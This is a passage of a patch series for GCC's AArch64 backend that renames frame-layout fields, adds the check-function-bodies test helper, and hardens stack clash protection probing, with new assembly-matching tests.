+Similarly to the previous locals_offset patch, hard_fp_offset
+was described as:
+
+ /* Offset from the base of the frame (incomming SP) to the
+ hard_frame_pointer. This value is always a multiple of
+ STACK_BOUNDARY. */
+ poly_int64 hard_fp_offset;
+
+which again took an “upside-down” view: higher offsets meant lower
+addresses. This patch renames the field to bytes_above_hard_fp instead.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::hard_fp_offset): Rename
+ to...
+ (aarch64_frame::bytes_above_hard_fp): ...this.
+ * config/aarch64/aarch64.c (aarch64_layout_frame)
+ (aarch64_expand_prologue): Update accordingly.
+ (aarch64_initial_elimination_offset): Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 21 +++++++++++----------
+ gcc/config/aarch64/aarch64.h | 6 +++---
+ 2 files changed, 14 insertions(+), 13 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index dcaf491af42..2681e0c2bb9 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4747,7 +4747,7 @@ aarch64_layout_frame (void)
+ HOST_WIDE_INT varargs_and_saved_regs_size
+ = offset + cfun->machine->frame.saved_varargs_size;
+
+- cfun->machine->frame.hard_fp_offset
++ cfun->machine->frame.bytes_above_hard_fp
+ = aligned_upper_bound (varargs_and_saved_regs_size
+ + get_frame_size (),
+ STACK_BOUNDARY / BITS_PER_UNIT);
+@@ -4756,7 +4756,7 @@ aarch64_layout_frame (void)
+ gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
+ STACK_BOUNDARY / BITS_PER_UNIT));
+ cfun->machine->frame.frame_size
+- = (cfun->machine->frame.hard_fp_offset
++ = (cfun->machine->frame.bytes_above_hard_fp
+ + cfun->machine->frame.bytes_below_hard_fp);
+
+ cfun->machine->frame.bytes_above_locals
+@@ -4788,7 +4788,7 @@ aarch64_layout_frame (void)
+ else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
+ + cfun->machine->frame.saved_regs_size, 512)
+ && !(cfun->calls_alloca
+- && known_lt (cfun->machine->frame.hard_fp_offset,
++ && known_lt (cfun->machine->frame.bytes_above_hard_fp,
+ max_push_offset)))
+ {
+ /* Frame with small area below the saved registers:
+@@ -4797,14 +4797,14 @@ aarch64_layout_frame (void)
+ stp reg3, reg4, [sp, bytes_below_hard_fp + 16] */
+ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
+ cfun->machine->frame.callee_offset
+- = cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
++ = cfun->machine->frame.frame_size - cfun->machine->frame.bytes_above_hard_fp;
+ }
+- else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
++ else if (cfun->machine->frame.bytes_above_hard_fp.is_constant (&const_fp_offset)
+ && const_fp_offset < max_push_offset)
+ {
+ /* Frame with large area below the saved registers, but with a
+ small area above:
+- stp reg1, reg2, [sp, -hard_fp_offset]!
++ stp reg1, reg2, [sp, -bytes_above_hard_fp]!
+ stp reg3, reg4, [sp, 16]
+ sub sp, sp, bytes_below_hard_fp */
+ cfun->machine->frame.callee_adjust = const_fp_offset;
+@@ -4814,12 +4814,13 @@ aarch64_layout_frame (void)
+ else
+ {
+ /* General case:
+- sub sp, sp, hard_fp_offset
++ sub sp, sp, bytes_above_hard_fp
+ stp x29, x30, [sp, 0]
+ add x29, sp, 0
+ stp reg3, reg4, [sp, 16]
+ sub sp, sp, bytes_below_hard_fp */
+- cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
++ cfun->machine->frame.initial_adjust
++ = cfun->machine->frame.bytes_above_hard_fp;
+ cfun->machine->frame.final_adjust
+ = cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
+ }
+@@ -8563,10 +8564,10 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
+ if (to == HARD_FRAME_POINTER_REGNUM)
+ {
+ if (from == ARG_POINTER_REGNUM)
+- return cfun->machine->frame.hard_fp_offset;
++ return cfun->machine->frame.bytes_above_hard_fp;
+
+ if (from == FRAME_POINTER_REGNUM)
+- return cfun->machine->frame.hard_fp_offset
++ return cfun->machine->frame.bytes_above_hard_fp
+ - cfun->machine->frame.bytes_above_locals;
+ }
+
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index a079a88b4f4..eab6da84a02 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -724,10 +724,10 @@ struct GTY (()) aarch64_frame
+ STACK_BOUNDARY. */
+ poly_int64 bytes_above_locals;
+
+- /* Offset from the base of the frame (incomming SP) to the
+- hard_frame_pointer. This value is always a multiple of
++ /* The number of bytes between the hard_frame_pointer and the top of
++ the frame (the incomming SP). This value is always a multiple of
+ STACK_BOUNDARY. */
+- poly_int64 hard_fp_offset;
++ poly_int64 bytes_above_hard_fp;
+
+ /* The size of the frame. This value is the offset from base of the
+ frame (incomming SP) to the stack_pointer. This value is always
+--
+2.34.1
+
+
+From eb2271eb6bb68ec3c9aa9ae4746ea1ee5f18874a Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Thu, 22 Jun 2023 22:26:30 +0100
+Subject: [PATCH 05/10] aarch64: Tweak frame_size comment
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch fixes another case in which a value was described with
+an “upside-down” view.
+
+gcc/
+ * config/aarch64/aarch64.h (aarch64_frame::frame_size): Tweak comment.
+---
+ gcc/config/aarch64/aarch64.h | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
+index eab6da84a02..7c4b65ec55b 100644
+--- a/gcc/config/aarch64/aarch64.h
++++ b/gcc/config/aarch64/aarch64.h
+@@ -729,8 +729,8 @@ struct GTY (()) aarch64_frame
+ STACK_BOUNDARY. */
+ poly_int64 bytes_above_hard_fp;
+
+- /* The size of the frame. This value is the offset from base of the
+- frame (incomming SP) to the stack_pointer. This value is always
++ /* The size of the frame, i.e. the number of bytes between the bottom
++ of the outgoing arguments and the incoming SP. This value is always
+ a multiple of STACK_BOUNDARY. */
+ poly_int64 frame_size;
+
+--
+2.34.1
+
+
+From cfed3b87e9351edff1568ade4ef666edc9887639 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 15 Aug 2023 19:05:30 +0100
+Subject: [PATCH 06/10] Backport check-function-bodies support
+
+---
+ gcc/testsuite/lib/scanasm.exp | 191 ++++++++++++++++++++++++++++++++++
+ 1 file changed, 191 insertions(+)
+
+diff --git a/gcc/testsuite/lib/scanasm.exp b/gcc/testsuite/lib/scanasm.exp
+index 35ccbc86fc0..c9af27bf47a 100644
+--- a/gcc/testsuite/lib/scanasm.exp
++++ b/gcc/testsuite/lib/scanasm.exp
+@@ -546,3 +546,194 @@ proc scan-lto-assembler { args } {
+ verbose "output_file: $output_file"
+ dg-scan "scan-lto-assembler" 1 $testcase $output_file $args
+ }
++
++# Read assembly file FILENAME and store a mapping from function names
++# to function bodies in array RESULT. FILENAME has already been uploaded
++# locally where necessary and is known to exist.
++
++proc parse_function_bodies { filename result } {
++ upvar $result up_result
++
++ # Regexp for the start of a function definition (name in \1).
++ set label {^([a-zA-Z_]\S+):$}
++
++ # Regexp for the end of a function definition.
++ set terminator {^\s*\.size}
++
++ # Regexp for lines that aren't interesting.
++ set fluff {^\s*(?:\.|//|@|$)}
++
++ set fd [open $filename r]
++ set in_function 0
++ while { [gets $fd line] >= 0 } {
++ if { [regexp $label $line dummy function_name] } {
++ set in_function 1
++ set function_body ""
++ } elseif { $in_function } {
++ if { [regexp $terminator $line] } {
++ set up_result($function_name) $function_body
++ set in_function 0
++ } elseif { ![regexp $fluff $line] } {
++ append function_body $line "\n"
++ }
++ }
++ }
++ close $fd
++}
++
++# FUNCTIONS is an array that maps function names to function bodies.
++# Return true if it contains a definition of function NAME and if
++# that definition matches BODY_REGEXP.
++
++proc check_function_body { functions name body_regexp } {
++ upvar $functions up_functions
++
++ if { ![info exists up_functions($name)] } {
++ return 0
++ }
++ set fn_res [regexp "^$body_regexp\$" $up_functions($name)]
++ if { !$fn_res } {
++ verbose -log "body: $body_regexp"
++ verbose -log "against: $up_functions($name)"
++ }
++ return $fn_res
++}
++
++# Check the implementations of functions against expected output. Used as:
++#
++# { dg-do { check-function-bodies PREFIX TERMINATOR[ OPTION[ SELECTOR]] } }
++#
++# See sourcebuild.texi for details.
++
++proc check-function-bodies { args } {
++ if { [llength $args] < 2 } {
++ error "too few arguments to check-function-bodies"
++ }
++ if { [llength $args] > 4 } {
++ error "too many arguments to check-function-bodies"
++ }
++
++ if { [llength $args] >= 3 } {
++ set required_flags [lindex $args 2]
++
++ upvar 2 dg-extra-tool-flags extra_tool_flags
++ set flags $extra_tool_flags
++
++ global torture_current_flags
++ if { [info exists torture_current_flags] } {
++ append flags " " $torture_current_flags
++ }
++ foreach required_flag $required_flags {
++ switch -- $required_flag {
++ target -
++ xfail {
++ error "misplaced $required_flag in check-function-bodies"
++ }
++ }
++ }
++ foreach required_flag $required_flags {
++ if { ![regexp " $required_flag " $flags] } {
++ return
++ }
++ }
++ }
++
++ set xfail_all 0
++ if { [llength $args] >= 4 } {
++ switch [dg-process-target [lindex $args 3]] {
++ "S" { }
++ "N" { return }
++ "F" { set xfail_all 1 }
++ "P" { }
++ }
++ }
++
++ set testcase [testname-for-summary]
++ # The name might include a list of options; extract the file name.
++ set filename [lindex $testcase 0]
++
++ global srcdir
++ set input_filename "$srcdir/$filename"
++ set output_filename "[file rootname [file tail $filename]].s"
++
++ set prefix [lindex $args 0]
++ set prefix_len [string length $prefix]
++ set terminator [lindex $args 1]
++ if { [string equal $terminator ""] } {
++ set terminator "*/"
++ }
++ set terminator_len [string length $terminator]
++
++ set have_bodies 0
++ if { [is_remote host] } {
++ remote_upload host "$filename"
++ }
++ if { [file exists $output_filename] } {
++ parse_function_bodies $output_filename functions
++ set have_bodies 1
++ } else {
++ verbose -log "$testcase: output file does not exist"
++ }
++
++ set count 0
++ set function_regexp ""
++ set label {^(\S+):$}
++
++ set lineno 1
++ set fd [open $input_filename r]
++ set in_function 0
++ while { [gets $fd line] >= 0 } {
++ if { [string equal -length $prefix_len $line $prefix] } {
++ set line [string trim [string range $line $prefix_len end]]
++ if { !$in_function } {
++ if { [regexp "^(.*?\\S)\\s+{(.*)}\$" $line dummy \
++ line selector] } {
++ set selector [dg-process-target $selector]
++ } else {
++ set selector "P"
++ }
++ if { ![regexp $label $line dummy function_name] } {
++ close $fd
++ error "check-function-bodies: line $lineno does not have a function label"
++ }
++ set in_function 1
++ set function_regexp ""
++ } elseif { [string equal $line "("] } {
++ append function_regexp "(?:"
++ } elseif { [string equal $line "|"] } {
++ append function_regexp "|"
++ } elseif { [string equal $line ")"] } {
++ append function_regexp ")"
++ } elseif { [string equal $line "..."] } {
++ append function_regexp ".*"
++ } else {
++ append function_regexp "\t" $line "\n"
++ }
++ } elseif { [string equal -length $terminator_len $line $terminator] } {
++ if { ![string equal $selector "N"] } {
++ if { $xfail_all || [string equal $selector "F"] } {
++ setup_xfail "*-*-*"
++ }
++ set testname "$testcase check-function-bodies $function_name"
++ if { !$have_bodies } {
++ unresolved $testname
++ } elseif { [check_function_body functions $function_name \
++ $function_regexp] } {
++ pass $testname
++ } else {
++ fail $testname
++ }
++ }
++ set in_function 0
++ incr count
++ }
++ incr lineno
++ }
++ close $fd
++ if { $in_function } {
++ error "check-function-bodies: missing \"$terminator\""
++ }
++ if { $count == 0 } {
++ error "check-function-bodies: no matches found"
++ }
++}
+--
+2.34.1
+
+
+From 4dd8925d95d3d6d89779b494b5f4cfadcf9fa96e Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 15:11:44 +0100
+Subject: [PATCH 07/10] aarch64: Tweak stack clash boundary condition
+
+The AArch64 ABI says that, when stack clash protection is used,
+there can be a maximum of 1KiB of unprobed space at sp on entry
+to a function. Therefore, we need to probe when allocating
+>= guard_size - 1KiB of data (>= rather than >). This is what
+GCC does.
+
+If an allocation is exactly guard_size bytes, it is enough to allocate
+those bytes and probe once at offset 1024. It isn't possible to use a
+single probe at any other offset: higher would conmplicate later code,
+by leaving more unprobed space than usual, while lower would risk
+leaving an entire page unprobed. For simplicity, the code probes all
+allocations at offset 1024.
+
+Some register saves also act as probes. If we need to allocate
+more space below the last such register save probe, we need to
+probe the allocation if it is > 1KiB. Again, this allocation is
+then sometimes (but not always) probed at offset 1024. This sort of
+allocation is currently only used for outgoing arguments, which are
+rarely this big.
+
+However, the code also probed if this final outgoing-arguments
+allocation was == 1KiB, rather than just > 1KiB. This isn't
+necessary, since the register save then probes at offset 1024
+as required. Continuing to probe allocations of exactly 1KiB
+would complicate later patches.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
+ Don't probe final allocations that are exactly 1KiB in size (after
+ unprobed space above the final allocation has been deducted).
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-check-prologue-17.c: New test.
+---
+ gcc/config/aarch64/aarch64.c | 6 +-
+ .../aarch64/stack-check-prologue-17.c | 55 +++++++++++++++++++
+ 2 files changed, 60 insertions(+), 1 deletion(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 2681e0c2bb9..4c9e11cd7cf 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -5506,6 +5506,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ HOST_WIDE_INT guard_size
+ = 1 << PARAM_VALUE (PARAM_STACK_CLASH_PROTECTION_GUARD_SIZE);
+ HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
++ HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
++ gcc_assert (multiple_p (poly_size, byte_sp_alignment));
+ /* When doing the final adjustment for the outgoing argument size we can't
+ assume that LR was saved at position 0. So subtract it's offset from the
+ ABI safe buffer so that we don't accidentally allow an adjustment that
+@@ -5513,7 +5515,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ probing. */
+ HOST_WIDE_INT min_probe_threshold
+ = final_adjustment_p
+- ? guard_used_by_caller - cfun->machine->frame.reg_offset[LR_REGNUM]
++ ? (guard_used_by_caller
++ + byte_sp_alignment
++ - cfun->machine->frame.reg_offset[LR_REGNUM])
+ : guard_size - guard_used_by_caller;
+
+ poly_int64 frame_size = cfun->machine->frame.frame_size;
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+new file mode 100644
+index 00000000000..0d8a25d73a2
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+@@ -0,0 +1,55 @@
++/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void f(int, ...);
++void g();
++
++/*
++** test1:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1024
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test1(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++ }
++ g();
++ return 1;
++}
++
++/*
++** test2:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1040
++** str xzr, \[sp\]
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test2(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x);
++ }
++ g();
++ return 1;
++}
+--
+2.34.1
+
+
+From 12517baf6c88447e3bda3a459ac4c29d61f84e6c Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 27 Jun 2023 15:12:55 +0100
+Subject: [PATCH 08/10] aarch64: Put LR save probe in first 16 bytes
+
+-fstack-clash-protection uses the save of LR as a probe for the next
+allocation. The next allocation could be:
+
+* another part of the static frame, e.g. when allocating SVE save slots
+ or outgoing arguments
+
+* an alloca in the same function
+
+* an allocation made by a callee function
+
+However, when -fomit-frame-pointer is used, the LR save slot is placed
+above the other GPR save slots. It could therefore be up to 80 bytes
+above the base of the GPR save area (which is also the hard fp address).
+
+aarch64_allocate_and_probe_stack_space took this into account when
+deciding how much subsequent space could be allocated without needing
+a probe. However, it interacted badly with:
+
+ /* If doing a small final adjustment, we always probe at offset 0.
+ This is done to avoid issues when LR is not at position 0 or when
+ the final adjustment is smaller than the probing offset. */
+ else if (final_adjustment_p && rounded_size == 0)
+ residual_probe_offset = 0;
+
+which forces any allocation that is smaller than the guard page size
+to be probed at offset 0 rather than the usual offset 1024. It was
+therefore possible to construct cases in which we had:
+
+* a probe using LR at SP + 80 bytes (or some other value >= 16)
+* an allocation of the guard page size - 16 bytes
+* a probe at SP + 0
+
+which allocates guard page size + 64 consecutive unprobed bytes.
+
+This patch requires the LR probe to be in the first 16 bytes of the
+save area when stack clash protection is active. Doing it
+unconditionally would cause code-quality regressions.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_layout_frame): Ensure that
+ the LR save slot is in the first 16 bytes of the register save area.
+ (aarch64_allocate_and_probe_stack_space): Remove workaround for
+ when LR was not in the first 16 bytes.
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-check-prologue-18.c: New test.
+---
+ gcc/config/aarch64/aarch64.c | 50 +++++----
+ .../aarch64/stack-check-prologue-18.c | 100 ++++++++++++++++++
+ 2 files changed, 127 insertions(+), 23 deletions(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 4c9e11cd7cf..1e8467fdd03 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4686,15 +4686,31 @@ aarch64_layout_frame (void)
+
+ cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
+
++#define ALLOCATE_GPR_SLOT(REGNO) \
++ do \
++ { \
++ cfun->machine->frame.reg_offset[REGNO] = offset; \
++ if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM) \
++ cfun->machine->frame.wb_candidate1 = (REGNO); \
++ else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM) \
++ cfun->machine->frame.wb_candidate2 = (REGNO); \
++ offset += UNITS_PER_WORD; \
++ } \
++ while (0)
++
+ if (cfun->machine->frame.emit_frame_chain)
+ {
+ /* FP and LR are placed in the linkage record. */
+- cfun->machine->frame.reg_offset[R29_REGNUM] = 0;
+- cfun->machine->frame.wb_candidate1 = R29_REGNUM;
+- cfun->machine->frame.reg_offset[R30_REGNUM] = UNITS_PER_WORD;
+- cfun->machine->frame.wb_candidate2 = R30_REGNUM;
+- offset = 2 * UNITS_PER_WORD;
++ ALLOCATE_GPR_SLOT (R29_REGNUM);
++ ALLOCATE_GPR_SLOT (R30_REGNUM);
+ }
++ else if (flag_stack_clash_protection
++ && cfun->machine->frame.reg_offset[R30_REGNUM] == SLOT_REQUIRED)
++ /* Put the LR save slot first, since it makes a good choice of probe
++ for stack clash purposes. The idea is that the link register usually
++ has to be saved before a call anyway, and so we lose little by
++ stopping it from being individually shrink-wrapped. */
++ ALLOCATE_GPR_SLOT (R30_REGNUM);
+
+ /* With stack-clash, LR must be saved in non-leaf functions. */
+ gcc_assert (crtl->is_leaf
+@@ -4704,14 +4720,9 @@ aarch64_layout_frame (void)
+ /* Now assign stack slots for them. */
+ for (regno = R0_REGNUM; regno <= R30_REGNUM; regno++)
+ if (cfun->machine->frame.reg_offset[regno] == SLOT_REQUIRED)
+- {
+- cfun->machine->frame.reg_offset[regno] = offset;
+- if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM)
+- cfun->machine->frame.wb_candidate1 = regno;
+- else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM)
+- cfun->machine->frame.wb_candidate2 = regno;
+- offset += UNITS_PER_WORD;
+- }
++ ALLOCATE_GPR_SLOT (regno);
++
++#undef ALLOCATE_GPR_SLOT
+
+ HOST_WIDE_INT max_int_offset = offset;
+ offset = ROUND_UP (offset, STACK_BOUNDARY / BITS_PER_UNIT);
+@@ -5508,16 +5519,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
+ HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
+ gcc_assert (multiple_p (poly_size, byte_sp_alignment));
+- /* When doing the final adjustment for the outgoing argument size we can't
+- assume that LR was saved at position 0. So subtract it's offset from the
+- ABI safe buffer so that we don't accidentally allow an adjustment that
+- would result in an allocation larger than the ABI buffer without
+- probing. */
+ HOST_WIDE_INT min_probe_threshold
+ = final_adjustment_p
+- ? (guard_used_by_caller
+- + byte_sp_alignment
+- - cfun->machine->frame.reg_offset[LR_REGNUM])
++ ? guard_used_by_caller + byte_sp_alignment
+ : guard_size - guard_used_by_caller;
+
+ poly_int64 frame_size = cfun->machine->frame.frame_size;
+@@ -5697,8 +5701,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ if (final_adjustment_p && rounded_size != 0)
+ min_probe_threshold = 0;
+ /* If doing a small final adjustment, we always probe at offset 0.
+- This is done to avoid issues when LR is not at position 0 or when
+- the final adjustment is smaller than the probing offset. */
++ This is done to avoid issues when the final adjustment is smaller
++ than the probing offset. */
+ else if (final_adjustment_p && rounded_size == 0)
+ residual_probe_offset = 0;
+
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+new file mode 100644
+index 00000000000..82447d20fff
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+@@ -0,0 +1,100 @@
++/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void f(int, ...);
++void g();
++
++/*
++** test1:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #4064
++** str xzr, \[sp\]
++** cbnz w0, .*
++** bl g
++** ...
++** str x26, \[sp, #?4128\]
++** ...
++*/
++int test1(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ asm volatile ("" :::
++ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++ }
++ g();
++ return 1;
++}
++
++/*
++** test2:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1040
++** str xzr, \[sp\]
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test2(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ asm volatile ("" :::
++ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x);
++ }
++ g();
++ return 1;
++}
++
++/*
++** test3:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1024
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test3(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ asm volatile ("" :::
++ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++ }
++ g();
++ return 1;
++}
+--
+2.34.1
+
+
+From f2684e63652bb251d22c79e40081c646df1f36b6 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 8 Aug 2023 01:57:26 +0100
+Subject: [PATCH 09/10] aarch64: Simplify probe of final frame allocation
+
+Previous patches ensured that the final frame allocation only needs
+a probe when the size is strictly greater than 1KiB. It's therefore
+safe to use the normal 1024 probe offset in all cases.
+
+The main motivation for doing this is to simplify the code and
+remove the number of special cases.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
+ Always probe the residual allocation at offset 1024, asserting
+ that that is in range.
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-check-prologue-17.c: Expect the probe
+ to be at offset 1024 rather than offset 0.
+ * gcc.target/aarch64/stack-check-prologue-18.c: Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 12 ++++--------
+ .../gcc.target/aarch64/stack-check-prologue-17.c | 2 +-
+ .../gcc.target/aarch64/stack-check-prologue-18.c | 7 +++++--
+ 3 files changed, 10 insertions(+), 11 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 1e8467fdd03..705f719a2ea 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -5695,16 +5695,12 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ are still safe. */
+ if (residual)
+ {
+- HOST_WIDE_INT residual_probe_offset = guard_used_by_caller;
++ gcc_assert (guard_used_by_caller + byte_sp_alignment <= size);
++
+ /* If we're doing final adjustments, and we've done any full page
+ allocations then any residual needs to be probed. */
+ if (final_adjustment_p && rounded_size != 0)
+ min_probe_threshold = 0;
+- /* If doing a small final adjustment, we always probe at offset 0.
+- This is done to avoid issues when the final adjustment is smaller
+- than the probing offset. */
+- else if (final_adjustment_p && rounded_size == 0)
+- residual_probe_offset = 0;
+
+ aarch64_sub_sp (temp1, temp2, residual, frame_related_p);
+ if (residual >= min_probe_threshold)
+@@ -5715,8 +5711,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ HOST_WIDE_INT_PRINT_DEC " bytes, probing will be required."
+ "\n", residual);
+
+- emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
+- residual_probe_offset));
++ emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
++ guard_used_by_caller));
+ emit_insn (gen_blockage ());
+ }
+ }
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+index 0d8a25d73a2..f0ec1389771 100644
+--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+@@ -33,7 +33,7 @@ int test1(int z) {
+ ** ...
+ ** str x30, \[sp\]
+ ** sub sp, sp, #1040
+-** str xzr, \[sp\]
++** str xzr, \[sp, #?1024\]
+ ** cbnz w0, .*
+ ** bl g
+ ** ...
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+index 82447d20fff..71d33ba34e9 100644
+--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+@@ -8,8 +8,9 @@ void g();
+ ** test1:
+ ** ...
